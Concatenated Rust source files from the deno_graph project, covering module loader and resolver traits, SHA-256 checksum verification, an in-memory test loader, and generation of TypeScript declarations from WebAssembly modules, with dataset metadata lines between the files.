/// the type only dependency in the graph.
pub fn get_type(&self) -> Option<&ModuleSpecifier> {
self.maybe_type.maybe_specifier()
}
/// Check to see if the position falls within the range of the code or types
/// entry for the dependency, returning a reference to the range if true,
/// otherwise none.
pub fn includes(&self, position: Position) -> Option<&Range> {
for import in &self.imports {
if import.specifier_range.includes(position) {
return Some(&import.specifier_range);
}
}
// `@deno-types` directives won't be associated with an import.
if let Some(range) = self.maybe_type.includes(position) {
return Some(range);
}
None
}
pub fn with_new_resolver(
&self,
specifier: &str,
jsr_url_provider: &dyn JsrUrlProvider,
maybe_resolver: Option<&dyn Resolver>,
) -> Self {
let maybe_code = self
.maybe_code
.maybe_range()
.map(|r| {
resolve(
specifier,
r.clone(),
ResolutionKind::Execution,
jsr_url_provider,
maybe_resolver,
)
})
.unwrap_or_default();
let maybe_type = self
.maybe_type
.maybe_range()
.map(|r| {
resolve(
self
.maybe_deno_types_specifier
.as_deref()
.unwrap_or(specifier),
r.clone(),
ResolutionKind::Types,
jsr_url_provider,
maybe_resolver,
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | true |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/source/mod.rs | src/source/mod.rs | // Copyright 2018-2024 the Deno authors. MIT license.
use std::collections::HashMap;
use std::fmt;
use std::path::Path;
use std::path::PathBuf;
use std::sync::Arc;
use std::time::SystemTime;
use async_trait::async_trait;
use deno_error::JsErrorClass;
use deno_media_type::MediaType;
use deno_media_type::data_url::RawDataUrl;
use deno_semver::StackString;
use deno_semver::package::PackageNv;
use deno_semver::package::PackageReq;
use futures::FutureExt;
use futures::future;
use futures::future::LocalBoxFuture;
use once_cell::sync::Lazy;
use serde::Deserialize;
use serde::Serialize;
use sys_traits::BaseFsReadDir;
use sys_traits::boxed::BoxedFsDirEntry;
use sys_traits::boxed::FsReadDirBoxed;
use thiserror::Error;
use url::Url;
use crate::ModuleSpecifier;
use crate::NpmLoadError;
use crate::SpecifierError;
use crate::analysis::ModuleInfo;
use crate::graph::Range;
use crate::module_specifier::resolve_import;
use crate::packages::JsrPackageInfo;
use crate::packages::JsrPackageVersionInfo;
pub type FileSystem = dyn FsReadDirBoxed;
pub struct NullFileSystem;
impl BaseFsReadDir for NullFileSystem {
type ReadDirEntry = BoxedFsDirEntry;
fn base_fs_read_dir(
&self,
_path: &Path,
) -> std::io::Result<
Box<dyn Iterator<Item = std::io::Result<Self::ReadDirEntry>>>,
> {
Ok(Box::new(std::iter::empty()))
}
}
pub mod wasm;
pub const DEFAULT_JSX_IMPORT_SOURCE_MODULE: &str = "jsx-runtime";
/// Information that comes from an external source which can be optionally
/// included in the module graph.
#[derive(Debug, Default, Clone, Deserialize, Serialize)]
pub struct CacheInfo {
/// The path to the local representation of the file. If a local file, the
/// path to the original file, if a remote file, the path to the file in the
/// cache.
pub local: Option<PathBuf>,
}
/// The response that is expected from a loader's `.load()` method.
///
/// The returned specifier is the final specifier. This can differ from the
/// requested specifier (e.g. if a redirect was encountered when loading)
#[derive(Debug, Clone, Deserialize, Serialize, PartialEq, Eq)]
#[serde(tag = "kind", rename_all = "camelCase")]
pub enum LoadResponse {
/// A module where the content is not available when building the graph, but
/// will be available at runtime. The module will be marked as
/// `ModuleKind::External` and no dependency analysis will be performed.
External { specifier: ModuleSpecifier },
/// Specifier redirected to another specifier.
///
/// It's important to return the redirects to deno_graph so it
/// can track them and also tell whether a checksum should be
/// sent with the load request for JSR dependencies loaded over
/// HTTPS via a redirect.
Redirect {
/// The final specifier of the module.
specifier: ModuleSpecifier,
},
/// A loaded module.
Module {
/// The content of the remote module.
content: Arc<[u8]>,
/// Last modified time if a file specifier.
mtime: Option<SystemTime>,
/// The final specifier of the module.
specifier: ModuleSpecifier,
/// If the module is a remote module, the headers should be returned as a
/// hashmap of lower-cased string values.
#[serde(rename = "headers", skip_serializing_if = "Option::is_none")]
maybe_headers: Option<HashMap<String, String>>,
},
}
#[derive(Debug, Error, deno_error::JsError)]
pub enum LoadError {
#[class(inherit)]
#[error(transparent)]
ChecksumIntegrity(#[from] ChecksumIntegrityError),
#[class(inherit)]
#[error(transparent)]
Other(Arc<dyn JsErrorClass>),
}
pub type LoadResult = Result<Option<LoadResponse>, LoadError>;
pub type LoadFuture = LocalBoxFuture<'static, LoadResult>;
pub enum CacheResponse {
Cached,
Redirect {
/// The final specifier of the module.
specifier: ModuleSpecifier,
},
}
pub type EnsureCachedResult = Result<Option<CacheResponse>, LoadError>;
pub type EnsureCachedFuture = LocalBoxFuture<'static, EnsureCachedResult>;
#[derive(Debug, Copy, Clone, PartialEq, Eq)]
pub enum CacheSetting {
/// Attempts to load a specifier from the cache.
///
/// This is used to see whether the specifier is in the cache for `jsr:` specifiers.
/// * If it is, then it will use the source provided to get the module information.
/// * If not, then it will use the manifest information to do resolution and
/// issue a separate request to the `load` method in order to get the source.
Only,
/// The implementation should prefer using the cache.
Use,
/// Loads a specifier where the implementation should not load
/// from an internal cache. This is only ever done when loading
/// `jsr:` specifier module information and the version constraint
/// cannot be resolved.
Reload,
}
impl CacheSetting {
/// String representation that can be sent to JS for consumption in deno_cache.
pub fn as_js_str(&self) -> &'static str {
// note: keep these values aligned with deno_cache
match self {
CacheSetting::Only => "only",
CacheSetting::Use => "use",
CacheSetting::Reload => "reload",
}
}
}
pub static DEFAULT_JSR_URL: Lazy<Url> =
Lazy::new(|| Url::parse("https://jsr.io").unwrap());
#[derive(Debug, Clone, Error, deno_error::JsError)]
#[class(generic)]
#[error("Integrity check failed.\n\nActual: {}\nExpected: {}", .actual, .expected
)]
pub struct ChecksumIntegrityError {
pub actual: String,
pub expected: String,
}
/// A SHA-256 checksum to verify the contents of a module
/// with while loading.
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq, Hash)]
pub struct LoaderChecksum(String);
impl LoaderChecksum {
pub fn new(checksum: String) -> Self {
Self(checksum)
}
pub fn into_string(self) -> String {
self.0
}
pub fn as_str(&self) -> &str {
&self.0
}
pub fn check_source(
&self,
source: &[u8],
) -> Result<(), ChecksumIntegrityError> {
let actual_checksum = Self::r#gen(source);
if self.0 == actual_checksum {
Ok(())
} else {
Err(ChecksumIntegrityError {
actual: actual_checksum,
expected: self.0.to_string(),
})
}
}
pub fn r#gen(source: &[u8]) -> String {
use sha2::Digest;
use sha2::Sha256;
let mut hasher = Sha256::new();
hasher.update(source);
format!("{:x}", hasher.finalize())
}
}
impl fmt::Display for LoaderChecksum {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "{}", self.0)
}
}
pub trait Locker {
fn get_remote_checksum(
&self,
specifier: &ModuleSpecifier,
) -> Option<LoaderChecksum>;
fn has_remote_checksum(&self, specifier: &ModuleSpecifier) -> bool;
fn set_remote_checksum(
&mut self,
specifier: &ModuleSpecifier,
checksum: LoaderChecksum,
);
fn get_pkg_manifest_checksum(
&self,
package_nv: &PackageNv,
) -> Option<LoaderChecksum>;
fn set_pkg_manifest_checksum(
&mut self,
package_nv: &PackageNv,
checksum: LoaderChecksum,
);
}
#[derive(Debug, Default, Clone)]
pub struct HashMapLocker {
remote: HashMap<ModuleSpecifier, LoaderChecksum>,
pkg_manifests: HashMap<PackageNv, LoaderChecksum>,
}
impl HashMapLocker {
pub fn remote(&self) -> &HashMap<ModuleSpecifier, LoaderChecksum> {
&self.remote
}
pub fn pkg_manifests(&self) -> &HashMap<PackageNv, LoaderChecksum> {
&self.pkg_manifests
}
}
impl Locker for HashMapLocker {
fn get_remote_checksum(
&self,
specifier: &ModuleSpecifier,
) -> Option<LoaderChecksum> {
self.remote.get(specifier).cloned()
}
fn has_remote_checksum(&self, specifier: &ModuleSpecifier) -> bool {
self.remote.contains_key(specifier)
}
fn set_remote_checksum(
&mut self,
specifier: &ModuleSpecifier,
checksum: LoaderChecksum,
) {
self.remote.insert(specifier.clone(), checksum);
}
fn get_pkg_manifest_checksum(
&self,
package_nv: &PackageNv,
) -> Option<LoaderChecksum> {
self.pkg_manifests.get(package_nv).cloned()
}
fn set_pkg_manifest_checksum(
&mut self,
package_nv: &PackageNv,
checksum: LoaderChecksum,
) {
self.pkg_manifests.insert(package_nv.clone(), checksum);
}
}
#[derive(Debug, Clone)]
pub struct LoadOptions {
/// If the specifier being loaded is part of a dynamic branch.
pub in_dynamic_branch: bool,
/// If the root specifier building the graph was in a dynamic branch.
///
/// This can be useful for telling if a dynamic load is statically analyzable
/// where `is_dynamic_branch` is `true`` and `was_dynamic_root` is `false`.
pub was_dynamic_root: bool,
pub cache_setting: CacheSetting,
/// It is the loader's responsibility to verify the provided checksum if it
/// exists because in the CLI we only verify the checksum of the source when
/// it is loaded from the global cache. We don't verify it when loaded from
/// the vendor folder.
///
/// The source may be verified by running `checksum.check_source(content)?`.
pub maybe_checksum: Option<LoaderChecksum>,
}
/// A trait which allows asynchronous loading of source files into a module
/// graph in a thread safe way as well as a way to provide additional meta data
/// about any cached resources.
pub trait Loader {
/// The maximum number of redirects allowed.
fn max_redirects(&self) -> usize {
10
}
/// Whether getting cache info is enabled.
fn cache_info_enabled(&self) -> bool {
false
}
/// An optional method which returns cache info for a module specifier.
fn get_cache_info(&self, _specifier: &ModuleSpecifier) -> Option<CacheInfo> {
None
}
/// A method that given a specifier that asynchronously returns the
/// source of the file.
///
/// To ensure errors surfaced in the graph are more specific for checksum
/// integrity errors, ensure this returns a `ChecksumIntegrityError` when
/// the checksum on `LoadOptions` does not match the loaded source.
fn load(
&self,
specifier: &ModuleSpecifier,
options: LoadOptions,
) -> LoadFuture;
/// Ensures the specified module is cached.
///
/// By default, this will just call `load`, but you can override
/// this to provide a more optimal way of caching that doesn't
/// load the bytes into memory.
fn ensure_cached(
&self,
specifier: &ModuleSpecifier,
options: LoadOptions,
) -> EnsureCachedFuture {
self
.load(specifier, options)
.map(|r| {
r.map(|v| {
v.map(|r| match r {
LoadResponse::Redirect { specifier } => {
CacheResponse::Redirect { specifier }
}
LoadResponse::External { .. } | LoadResponse::Module { .. } => {
CacheResponse::Cached
}
})
})
})
.boxed_local()
}
}
pub trait ModuleInfoCacher {
/// Cache the module info for the provided specifier if the loader
/// supports caching this information.
fn cache_module_info(
&self,
specifier: &ModuleSpecifier,
media_type: MediaType,
source: &Arc<[u8]>,
module_info: &ModuleInfo,
);
}
pub struct NullModuleInfoCacher;
impl ModuleInfoCacher for NullModuleInfoCacher {
fn cache_module_info(
&self,
_specifier: &ModuleSpecifier,
_media_type: MediaType,
_source: &Arc<[u8]>,
_module_info: &ModuleInfo,
) {
}
}
impl Default for &dyn ModuleInfoCacher {
fn default() -> Self {
&NullModuleInfoCacher
}
}
pub trait JsrUrlProvider {
fn url(&self) -> &Url {
&DEFAULT_JSR_URL
}
fn package_url(&self, nv: &PackageNv) -> Url {
recommended_registry_package_url(self.url(), nv)
}
fn package_url_to_nv(&self, url: &Url) -> Option<PackageNv> {
recommended_registry_package_url_to_nv(self.url(), url)
}
}
impl<'a> Default for &'a dyn JsrUrlProvider {
fn default() -> &'a dyn JsrUrlProvider {
&DefaultJsrUrlProvider
}
}
#[derive(Debug, Default, Copy, Clone)]
pub struct DefaultJsrUrlProvider;
impl JsrUrlProvider for DefaultJsrUrlProvider {}
/// The recommended way for getting the registry URL for a package.
///
/// This will concat the registry URL with the package name, a slash, then the version.
pub fn recommended_registry_package_url(
registry_url: &Url,
nv: &PackageNv,
) -> Url {
registry_url
.join(&format!("{}/{}/", nv.name, nv.version))
.unwrap()
}
/// The recommended way to get the package name and version from a URL
/// that is found on the registry.
pub fn recommended_registry_package_url_to_nv(
registry_url: &Url,
url: &Url,
) -> Option<PackageNv> {
let path = url.as_str().strip_prefix(registry_url.as_str())?;
let path = path.strip_prefix('/').unwrap_or(path);
let mut parts = path.split('/');
let scope = parts.next()?;
let name = parts.next()?;
let version = parts.next()?;
Some(PackageNv {
name: {
capacity_builder::StringBuilder::<StackString>::build(|builder| {
builder.append(scope);
builder.append('/');
builder.append(name);
})
.unwrap()
},
version: deno_semver::Version::parse_standard(version).ok()?,
})
}
#[derive(Error, Debug, deno_error::JsError)]
pub enum ResolveError {
#[class(type)]
#[error(transparent)]
Specifier(#[from] SpecifierError),
#[class(inherit)]
#[error(transparent)]
ImportMap(#[from] import_map::ImportMapError),
#[class(inherit)]
#[error(transparent)]
Other(#[from] deno_error::JsErrorBox),
}
/// The kind of resolution currently being done by deno_graph.
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)]
pub enum ResolutionKind {
/// Resolving for code that will be executed.
Execution,
/// Resolving for code that will be used for type information.
Types,
}
impl ResolutionKind {
pub fn is_types(&self) -> bool {
*self == ResolutionKind::Types
}
}
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Deserialize, Serialize)]
#[serde(rename_all = "camelCase")]
pub enum ResolutionMode {
/// Resolving as an ES module.
Import,
/// Resolving as a CJS module.
Require,
}
/// A trait which allows the module graph to resolve specifiers and type only
/// dependencies. This can be use to provide import maps and override other
/// default resolution logic used by `deno_graph`.
pub trait Resolver: fmt::Debug {
/// An optional method that returns the default JSX import source if one is
/// configured. If this method returns `Some` and a JSX file is encountered
/// that does not have an import source specified as a pragma, this import
/// source will be used instead.
fn default_jsx_import_source(
&self,
_referrer: &ModuleSpecifier,
) -> Option<String> {
None
}
/// An optional method that returns the default JSX types import source if one
/// is configured. If this method returns `Some` and a JSX file is encountered
/// that does not have an types import source specified as a pragma, this
/// types import source will be used instead.
fn default_jsx_import_source_types(
&self,
_referrer: &ModuleSpecifier,
) -> Option<String> {
None
}
/// An optional method which returns the JSX import source module which will
/// be appended to any JSX import source pragmas identified.
fn jsx_import_source_module(&self, _referrer: &ModuleSpecifier) -> &str {
DEFAULT_JSX_IMPORT_SOURCE_MODULE
}
/// Given a string specifier and a referring module specifier, return a
/// resolved module specifier.
fn resolve(
&self,
specifier_text: &str,
referrer_range: &Range,
_kind: ResolutionKind,
) -> Result<ModuleSpecifier, ResolveError> {
Ok(resolve_import(specifier_text, &referrer_range.specifier)?)
}
/// Given a module specifier, return an optional tuple which provides a module
/// specifier that contains the types for the module and an optional range
/// which contains information about the source of the dependency. This will
/// only be called for module specifiers are resolved to a non-typed input
/// (e.g. JavaScript and JSX) and there is not yet types resolved for this
/// module. Any result will be set on the modules `maybe_types_dependency`
/// property.
fn resolve_types(
&self,
_specifier: &ModuleSpecifier,
) -> Result<Option<(ModuleSpecifier, Option<Range>)>, ResolveError> {
Ok(None)
}
}
#[derive(Debug)]
pub struct NpmResolvePkgReqsResult {
/// The individual results of resolving the package requirements.
///
/// This MUST correspond to the indexes of the provided package requirements.
pub results: Vec<Result<PackageNv, NpmLoadError>>,
/// Result of resolving the entire dependency graph after the initial reqs
/// were resolved to NVs.
///
/// Don't run dependency graph resolution if there are any individual failures.
pub dep_graph_result: Result<(), Arc<dyn JsErrorClass>>,
}
#[async_trait(?Send)]
pub trait NpmResolver: fmt::Debug {
/// This is an optimization for the implementation to start loading and caching
/// the npm registry package information ahead of time.
fn load_and_cache_npm_package_info(&self, package_name: &str);
/// Resolves a the package version requirements.
///
/// The implementation MUST return the same amount of resolutions back as
/// version reqs provided or else a panic will occur.
async fn resolve_pkg_reqs(
&self,
package_req: &[PackageReq],
) -> NpmResolvePkgReqsResult;
}
pub fn load_data_url(
specifier: &ModuleSpecifier,
) -> Result<Option<LoadResponse>, std::io::Error> {
let data_url = RawDataUrl::parse(specifier)?;
let (bytes, mime_type) = data_url.into_bytes_and_mime_type();
let headers = HashMap::from([("content-type".to_string(), mime_type)]);
Ok(Some(LoadResponse::Module {
specifier: specifier.clone(),
maybe_headers: Some(headers),
mtime: None,
content: Arc::from(bytes),
}))
}
/// An implementation of the loader attribute where the responses are provided
/// ahead of time. This is useful for testing or
#[derive(Default)]
pub struct MemoryLoader {
sources:
HashMap<ModuleSpecifier, Result<LoadResponse, Arc<dyn JsErrorClass>>>,
cache_info: HashMap<ModuleSpecifier, CacheInfo>,
}
pub enum Source<S, C> {
Module {
specifier: S,
maybe_headers: Option<Vec<(S, S)>>,
content: C,
},
Redirect(S),
External(S),
Err(Arc<dyn JsErrorClass>),
}
impl<S: AsRef<str>, C: AsRef<[u8]>> Source<S, C> {
fn into_result(self) -> Result<LoadResponse, Arc<dyn JsErrorClass>> {
match self {
Source::Module {
specifier,
maybe_headers,
content,
} => Ok(LoadResponse::Module {
specifier: ModuleSpecifier::parse(specifier.as_ref()).unwrap(),
mtime: None,
maybe_headers: maybe_headers.map(|h| {
h.into_iter()
.map(|(k, v)| {
(
(k.as_ref() as &str).to_string(),
(v.as_ref() as &str).to_string(),
)
})
.collect()
}),
content: Arc::from(content.as_ref().to_vec()),
}),
Source::Redirect(specifier) => Ok(LoadResponse::Redirect {
specifier: ModuleSpecifier::parse(specifier.as_ref()).unwrap(),
}),
Source::External(specifier) => Ok(LoadResponse::External {
specifier: ModuleSpecifier::parse(specifier.as_ref()).unwrap(),
}),
Source::Err(error) => Err(error),
}
}
}
pub type MemoryLoaderSources<S, C> = Vec<(S, Source<S, C>)>;
impl MemoryLoader {
pub fn new<S: AsRef<str>, C: AsRef<[u8]>>(
sources: MemoryLoaderSources<S, C>,
cache_info: Vec<(S, CacheInfo)>,
) -> Self {
Self {
sources: sources
.into_iter()
.map(|(s, r)| {
let specifier = ModuleSpecifier::parse(s.as_ref()).unwrap();
(specifier, r.into_result())
})
.collect(),
cache_info: cache_info
.into_iter()
.map(|(s, c)| {
let specifier = ModuleSpecifier::parse(s.as_ref()).unwrap();
(specifier, c)
})
.collect(),
}
}
pub fn add_bytes_source(
&mut self,
specifier: impl AsRef<str>,
content: Vec<u8>,
) {
self.sources.insert(
ModuleSpecifier::parse(specifier.as_ref()).unwrap(),
Ok(LoadResponse::Module {
specifier: ModuleSpecifier::parse(specifier.as_ref()).unwrap(),
mtime: None,
maybe_headers: None,
content: Arc::from(content),
}),
);
}
pub fn add_source<S: AsRef<str>, C: AsRef<[u8]>>(
&mut self,
specifier: impl AsRef<str>,
source: Source<S, C>,
) {
let specifier = ModuleSpecifier::parse(specifier.as_ref()).unwrap();
self.sources.insert(specifier, source.into_result());
}
pub fn add_external_source(&mut self, specifier: impl AsRef<str>) {
self.add_source(
specifier.as_ref(),
Source::<_, [u8; 0]>::External(specifier.as_ref().to_string()),
);
}
pub fn add_source_with_text(
&mut self,
specifier: impl AsRef<str>,
source: impl AsRef<str>,
) {
self.add_source(
specifier.as_ref(),
Source::Module {
specifier: specifier.as_ref().to_string(),
maybe_headers: None,
content: source.as_ref().to_string(),
},
);
}
pub fn add_jsr_package_info(
&mut self,
name: &str,
package_info: &JsrPackageInfo,
) {
let specifier = DEFAULT_JSR_URL
.join(&format!("{}/meta.json", name))
.unwrap();
let json_text = serde_json::to_string(package_info).unwrap();
self.add_source_with_text(specifier, json_text);
}
pub fn add_jsr_version_info(
&mut self,
name: &str,
version: &str,
version_info: &JsrPackageVersionInfo,
) {
let specifier = DEFAULT_JSR_URL
.join(&format!("{}/{}_meta.json", name, version))
.unwrap();
let json_text = serde_json::to_string(version_info).unwrap();
self.add_source_with_text(specifier, json_text);
}
}
impl Loader for MemoryLoader {
fn get_cache_info(&self, specifier: &ModuleSpecifier) -> Option<CacheInfo> {
self.cache_info.get(specifier).cloned()
}
fn load(
&self,
specifier: &ModuleSpecifier,
_options: LoadOptions,
) -> LoadFuture {
let response = match self.sources.get(specifier) {
Some(Ok(response)) => Ok(Some(response.clone())),
Some(Err(err)) => Err(LoadError::Other(err.clone())),
None if specifier.scheme() == "data" => {
load_data_url(specifier).map_err(|e| LoadError::Other(Arc::new(e)))
}
_ => Ok(None),
};
Box::pin(future::ready(response))
}
}
/// A trait which can be used to allow the module graph to report status events
/// to the user.
pub trait Reporter: fmt::Debug + Send + Sync {
#[allow(unused_variables)]
/// A handler that is called after each load of a module. It contains the
/// module specifier of the module that was loaded, and the number of modules
/// seen (total number of unique specifiers seen), and the number of modules
/// loaded (where [Loader::load] has been called, and the returned future is
/// ready).
fn on_load(
&self,
specifier: &ModuleSpecifier,
modules_done: usize,
modules_total: usize,
) {
}
#[allow(unused_variables)]
/// A handler that is called after each resolution of a package requirement.
/// It contains the package requirement and the package name and version that
/// was resolved.
fn on_resolve(&self, req: &PackageReq, package_nv: &PackageNv) {}
}
/// Resolve a media type and optionally the charset from a module specifier and
/// the value of a content type header.
pub fn resolve_media_type_and_charset_from_headers<'a>(
specifier: &ModuleSpecifier,
maybe_headers: Option<&'a HashMap<String, String>>,
) -> (MediaType, Option<&'a str>) {
deno_media_type::resolve_media_type_and_charset_from_content_type(
specifier,
maybe_headers
.and_then(|h| h.get("content-type"))
.map(|v| v.as_str()),
)
}
/// Resolve a media type and optionally the charset from a module specifier and
/// the value of a content type header.
pub fn resolve_media_type_and_charset_from_content_type<'a>(
specifier: &ModuleSpecifier,
maybe_content_type: Option<&'a String>,
) -> (MediaType, Option<&'a str>) {
if let Some(content_type) = maybe_content_type {
let mut content_types = content_type.split(';');
let media_type = content_types
.next()
.map(|content_type| MediaType::from_content_type(specifier, content_type))
.unwrap_or(MediaType::Unknown);
let charset = content_types
.map(str::trim)
.find_map(|s| s.strip_prefix("charset="));
(media_type, charset)
} else {
(MediaType::from_specifier(specifier), None)
}
}
#[cfg(test)]
pub mod tests {
use super::*;
use crate::module_specifier::resolve_import;
use serde_json::json;
#[derive(Debug)]
pub(crate) struct MockResolver {
map: HashMap<ModuleSpecifier, HashMap<String, ModuleSpecifier>>,
types: HashMap<ModuleSpecifier, (ModuleSpecifier, Option<Range>)>,
}
impl MockResolver {
pub fn new<S: AsRef<str>>(
map: Vec<(S, Vec<(S, S)>)>,
types: Vec<(S, (S, Option<Range>))>,
) -> Self {
Self {
map: map
.into_iter()
.map(|(r, m)| {
let referrer = ModuleSpecifier::parse(r.as_ref()).unwrap();
let map = m
.into_iter()
.map(|(s, ms)| {
let specifier_str = s.as_ref().to_string();
let specifier = ModuleSpecifier::parse(ms.as_ref()).unwrap();
(specifier_str, specifier)
})
.collect();
(referrer, map)
})
.collect(),
types: types
.into_iter()
.map(|(s, (t, ms))| {
let specifier = ModuleSpecifier::parse(s.as_ref()).unwrap();
let types_specifier = ModuleSpecifier::parse(t.as_ref()).unwrap();
(specifier, (types_specifier, ms))
})
.collect(),
}
}
}
impl Resolver for MockResolver {
fn resolve(
&self,
specifier: &str,
referrer_range: &Range,
_resolution_kind: ResolutionKind,
) -> Result<ModuleSpecifier, ResolveError> {
if let Some(map) = self.map.get(&referrer_range.specifier)
&& let Some(resolved_specifier) = map.get(specifier)
{
return Ok(resolved_specifier.clone());
}
Ok(resolve_import(specifier, &referrer_range.specifier)?)
}
fn resolve_types(
&self,
specifier: &ModuleSpecifier,
) -> Result<Option<(ModuleSpecifier, Option<Range>)>, ResolveError> {
Ok(self.types.get(specifier).cloned())
}
}
#[test]
fn test_deserialize_load_response() {
let actual: LoadResponse = serde_json::from_value(
json!({ "kind": "external", "specifier": "https://example.com/bundle" }),
)
.unwrap();
assert_eq!(
actual,
LoadResponse::External {
specifier: ModuleSpecifier::parse("https://example.com/bundle")
.unwrap()
}
);
}
}
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/source/wasm.rs | src/source/wasm.rs | // Copyright 2018-2024 the Deno authors. MIT license.
use capacity_builder::StringBuilder;
use indexmap::IndexMap;
use wasm_dep_analyzer::ValueType;
pub fn wasm_module_to_dts(
bytes: &[u8],
) -> Result<String, wasm_dep_analyzer::ParseError> {
let wasm_deps = wasm_dep_analyzer::WasmDeps::parse(
bytes,
wasm_dep_analyzer::ParseOptions { skip_types: false },
)?;
Ok(wasm_module_deps_to_dts(&wasm_deps))
}
fn wasm_module_deps_to_dts(wasm_deps: &wasm_dep_analyzer::WasmDeps) -> String {
#[derive(PartialEq, Eq)]
enum TypePosition {
Input,
Output,
}
fn value_type_to_ts_type(
value_type: ValueType,
position: TypePosition,
) -> &'static str {
match value_type {
ValueType::I32 => "number",
ValueType::I64 if position == TypePosition::Input => "bigint | number",
ValueType::I64 => "bigint",
ValueType::F32 => "number",
ValueType::F64 => "number",
ValueType::Unknown => "unknown",
}
}
#[cfg(feature = "swc")]
fn is_valid_ident(export_name: &str) -> bool {
!export_name.is_empty()
&& deno_ast::swc::ast::Ident::verify_symbol(export_name).is_ok()
}
#[cfg(not(feature = "swc"))]
fn is_valid_ident(_export_name: &str) -> bool {
// Just assume everything is not valid if not using deno_ast.
// This should not be a big deal because it just means that
// this code will quote all the properties.
false
}
let is_valid_export_ident_per_export = wasm_deps
.exports
.iter()
.map(|export| is_valid_ident(export.name))
.collect::<Vec<_>>();
let mut unique_import_modules: IndexMap<&str, Vec<&str>> =
IndexMap::with_capacity(wasm_deps.imports.len());
for import in &wasm_deps.imports {
let entry = unique_import_modules.entry(import.module).or_default();
entry.push(import.name);
}
StringBuilder::build(|builder| {
let mut count = 0;
for (import_module, named_imports) in &unique_import_modules {
builder.append("import { ");
// we add the named imports in order to cause a type checking error if
// the importing module does not have it as an export
for (i, named_import) in named_imports.iter().enumerate() {
if i > 0 {
builder.append(", ");
}
builder.append('"');
builder.append(*named_import);
builder.append("\" as __deno_wasm_import_");
builder.append(count);
builder.append("__");
count += 1;
}
builder.append(" } from \"");
builder.append(*import_module);
builder.append("\";\n");
}
for (i, export) in wasm_deps.exports.iter().enumerate() {
let has_valid_export_ident = is_valid_export_ident_per_export[i];
if has_valid_export_ident {
builder.append("export ");
}
fn write_export_name<'a>(
builder: &mut StringBuilder<'a>,
export: &'a wasm_dep_analyzer::Export<'a>,
has_valid_export_ident: bool,
index: usize,
) {
if has_valid_export_ident {
builder.append(export.name);
} else {
builder.append("__deno_wasm_export_");
builder.append(index);
builder.append("__");
}
}
let mut add_var = |type_text: &'static str| {
builder.append("declare const ");
write_export_name(builder, export, has_valid_export_ident, i);
builder.append(": ");
builder.append(type_text);
builder.append(";\n");
};
match &export.export_type {
wasm_dep_analyzer::ExportType::Function(function_signature) => {
match function_signature {
Ok(signature) => {
builder.append("declare function ");
write_export_name(builder, export, has_valid_export_ident, i);
builder.append('(');
for (i, param) in signature.params.iter().enumerate() {
if i > 0 {
builder.append(", ");
}
builder.append("arg");
builder.append(i);
builder.append(": ");
builder
.append(value_type_to_ts_type(*param, TypePosition::Input));
}
builder.append("): ");
builder.append(
signature
.returns
.first()
.map(|t| value_type_to_ts_type(*t, TypePosition::Output))
.unwrap_or("void"),
);
builder.append(";\n");
}
Err(_) => add_var("unknown"),
}
}
wasm_dep_analyzer::ExportType::Table => add_var("WebAssembly.Table"),
wasm_dep_analyzer::ExportType::Memory => add_var("WebAssembly.Memory"),
wasm_dep_analyzer::ExportType::Global(global_type) => match global_type
{
Ok(global_type) => add_var(value_type_to_ts_type(
global_type.value_type,
TypePosition::Output,
)),
Err(_) => add_var("unknown"),
},
wasm_dep_analyzer::ExportType::Tag
| wasm_dep_analyzer::ExportType::Unknown => add_var("unknown"),
}
if !has_valid_export_ident {
builder.append("export { ");
write_export_name(builder, export, has_valid_export_ident, i);
builder.append(" as \"");
builder.append(export.name);
builder.append("\" };\n");
}
}
})
.unwrap()
}
#[cfg(test)]
mod test {
use pretty_assertions::assert_eq;
use wasm_dep_analyzer::Export;
use wasm_dep_analyzer::FunctionSignature;
use wasm_dep_analyzer::Import;
use wasm_dep_analyzer::WasmDeps;
use super::*;
#[test]
fn test_output() {
let text = wasm_module_deps_to_dts(&WasmDeps {
imports: vec![
Import {
name: "name1",
module: "./mod.ts",
import_type: wasm_dep_analyzer::ImportType::Function(0),
},
Import {
name: "name1",
module: "./other.ts",
import_type: wasm_dep_analyzer::ImportType::Function(0),
},
Import {
name: "name2",
module: "./mod.ts",
import_type: wasm_dep_analyzer::ImportType::Function(0),
},
],
exports: vec![
Export {
name: "name--1",
index: 0,
export_type: wasm_dep_analyzer::ExportType::Function(Ok(
FunctionSignature {
params: vec![],
returns: vec![],
},
)),
},
Export {
name: "name2",
index: 1,
export_type: wasm_dep_analyzer::ExportType::Function(Ok(
FunctionSignature {
params: vec![ValueType::I32, ValueType::I64],
returns: vec![ValueType::I64],
},
)),
},
Export {
name: "name3",
index: 2,
export_type: wasm_dep_analyzer::ExportType::Function(Err(
wasm_dep_analyzer::ParseError::IntegerOverflow,
)),
},
Export {
name: "name4",
index: 3,
export_type: wasm_dep_analyzer::ExportType::Table,
},
Export {
name: "name5",
index: 4,
export_type: wasm_dep_analyzer::ExportType::Memory,
},
Export {
name: "name6",
index: 5,
export_type: wasm_dep_analyzer::ExportType::Global(Ok(
wasm_dep_analyzer::GlobalType {
value_type: ValueType::I32,
mutability: false,
},
)),
},
Export {
name: "name7",
index: 6,
export_type: wasm_dep_analyzer::ExportType::Global(Err(
wasm_dep_analyzer::ParseError::NotWasm,
)),
},
Export {
name: "name8",
index: 7,
export_type: wasm_dep_analyzer::ExportType::Unknown,
},
Export {
name: "name9--",
index: 8,
export_type: wasm_dep_analyzer::ExportType::Unknown,
},
Export {
name: "default",
index: 9,
export_type: wasm_dep_analyzer::ExportType::Unknown,
},
],
});
assert_eq!(
text,
"import { \"name1\" as __deno_wasm_import_0__, \"name2\" as __deno_wasm_import_1__ } from \"./mod.ts\";
import { \"name1\" as __deno_wasm_import_2__ } from \"./other.ts\";
declare function __deno_wasm_export_0__(): void;
export { __deno_wasm_export_0__ as \"name--1\" };
export declare function name2(arg0: number, arg1: bigint | number): bigint;
export declare const name3: unknown;
export declare const name4: WebAssembly.Table;
export declare const name5: WebAssembly.Memory;
export declare const name6: number;
export declare const name7: unknown;
